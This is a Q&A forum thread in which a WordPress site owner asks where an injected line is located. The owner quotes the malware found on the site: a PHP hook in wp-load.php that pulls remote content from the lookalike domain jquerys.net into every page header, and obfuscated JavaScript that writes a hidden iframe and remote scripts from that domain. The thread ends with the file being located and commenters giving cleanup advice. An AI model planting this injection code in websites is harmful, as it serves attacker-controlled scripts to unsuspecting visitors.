# Where could this line be located?

Tags: php, html, wordpress, virus

I recently made a website with WordPress, but this virus has been bugging me lately. It edits the whole `wp-load` file and writes:

```
function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http ://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth');
```

Notice that it points to a fake jquery site "`jqueryS`". I finally found the line that is causing it by going to my homepage ([topdailyfights.com](http://topdailyfights.com)) and inspecting the code (it's on **line 78**) but not sure which one of the wordpress files contains it.

**This is the code:**

```
<script type="text/javascript">if(document.referrer == ''){document.write('<if'+'rame src="http://jquerys.net/analytics.php?frame=yes" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></ifr'+'ame>');document.write('<s'+'cript type="text/javascript" src="http://jquerys.net/analytics.js"></scrip'+'t>');}else{document.write('<sc'+'ript type="text/javascript"src="http://jquerys.net/jquery.js"></scrip'+'t>');}</script><script type="text/javascript" src="http://jquerys.net/license.js"></script><style type="text/css" media="print">#wpadminbar { display:none; }</style>
```

Where could this line be located?

Thanks in advance,

JB

***SOLVED***

The file name is `wp-load.php` located in `www` folder. I was searching in `public_html` folder the whole time. Used [Windows Grep](http://www.wingrep.com/) to find it.

Awesome tool; I recommend.

Thanks everyone.

Comment: delete it all, replace with back up, patch it, change all passwords.

Comment: @Dagon All back ups I have contain the hack. Jayson I don't know how to do that

Comment: then restore from source

Comment: http://codex.wordpress.org/FAQ_My_site_was_hacked | http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: SOLVED!

The file name is wp-load.php located in www folder. I was searching in public_html folder the whole time.

Comment: Please, add your solution as an Answer.

Answer (score 1, accepted):

The file name is wp-load.php located in www folder. I was searching in public_html folder the whole time. Used Windows Grep to find it. Awesome tool; I recommend. Thanks everyone.